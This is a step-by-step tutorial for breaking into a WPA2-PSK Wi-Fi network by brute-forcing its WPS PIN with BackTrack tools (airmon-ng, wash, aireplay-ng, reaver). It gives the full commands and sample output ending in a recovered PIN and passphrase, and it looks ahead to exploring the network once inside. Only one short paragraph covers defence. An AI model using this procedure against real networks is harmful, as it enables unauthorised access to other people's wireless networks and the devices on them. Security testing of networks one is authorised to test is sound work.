Cracking WPA using BackTrack (WPS attack)

1. Some background info
WPS stands for Wireless Protected Setup and it's a protocol designed for simplifying the process of connecting clients to wireless networks. Routers provide clients with an 8 digits PIN code for clients to use to connect. Some also have a button which you can press when a client tries to connect to have it connected automatically without requiring the client to enter a key or PIN.

2. The task
In this post we will crack a WPA2-PSK encrypted access point which has WPS enabled and get the key and PIN. For cracking WPA2-PSK with a different method see this post.

3. Requirements
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption which support WPS and has it enabled;

4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.

   airmon-ng start wlan0

Now that our wireless card is properly setup, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information:

   airodump-ng mon0

The output is something like this:

 CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08                                      
                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID              
                                                                                               
 80:1F:02:4B:F9:5C  -45        8        0    0  11  54e  WPA2 CCMP   PSK  Edimax AP          
 10:BF:48:92:A2:80  -87        5        0    0   1  54e  WPA2 CCMP   PSK  ASUS                
                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                    
                                                                                               
 80:1F:02:4B:F9:5C  60:D8:19:A7:33:21  -50    0 - 5e     0        1                            

The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption. We don't know yet if our target, Edimax AP, has WPS enabled. Let's stop airodump-ng and use wash to check our target:

   wash -i mon0 -c 11

We're checking all access points using channel 11. In our case Edimax AP appears to have WPS enabled (output will come soon, forgot to save it).

If you're getting an error that wash cannot get to channel 11 it's because airodump-ng hops on channels and interface's channel remains set to whatever the channel airodump-ng was on when stopped. Run this command to have your interface switched to channel 11:

   airodump-ng --channel 11 mon0

Time to try and attack it. For that we'll use reaver. Reaver attempts to associate with the target AP then begins a brute-force attack, trying out each PIN combination. Because of the way WPS is designed, although it has 8 digits, there are only 11.000 possible combinations. Assuming the correct PIN is not the last one reaver tries, there will be a lot fewer attempts before the correct pin is found. Let's fire up reaver and see what comes up:

   reaver -i mon0 -b 80:1F:02:4B:F9:5C -vv

The output will start flowing:

[+] Waiting for beacon from 80:1F:02:4B:F9:5C
[+] Switching mon0 to channel 11
[+] Associated with 80:1F:02:4B:F9:5C (ESSID: Edimax AP)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
...and so on

Quick note: with some routers reaver will not be able to associate. In this case we can use aireplay-ng and tell reaver not to attempt association. You might also need to have aireplay-ng trying to associate constantly. It all depends on the AP model and how its firmware works. You need to play around and experiment. The following commands will associate using aireplay:

   aireplay-ng --fakeauth 30 -e "Edimax AP" mon0

And to tell reaver that we are associating through some other application:

   reaver -i mon0 -A -b 80:1F:02:4B:F9:5C -vv

After a while, if everything is ok you will get this:

[+] Trying pin 63442519
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 678 seconds
[+] WPS PIN: '63442519'
[+] WPA PSK: 'Test1234'
[+] AP SSID: 'Edimax AP'

Congratulations, you have just cracked the key and the PIN.

5. Alternatives
BackTrack also comes with Fern WIFI Cracker(Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Fern-wifi-cracker-ng) which has a nice GUI for finding targets and attacking them.

6. How to defend
Defending against this attack should be as simple as disabling WPS. However some routers/APs keep WPS enabled even if you disable it from the settings and what's worse is that they also respond to reaver's requests. Here is a list of various router models and how vulnerable they are to this attack.

7. What's next?
Now that we gained access to the network it's time to explore it. In the next post we'll see how to discover targets and get information about them.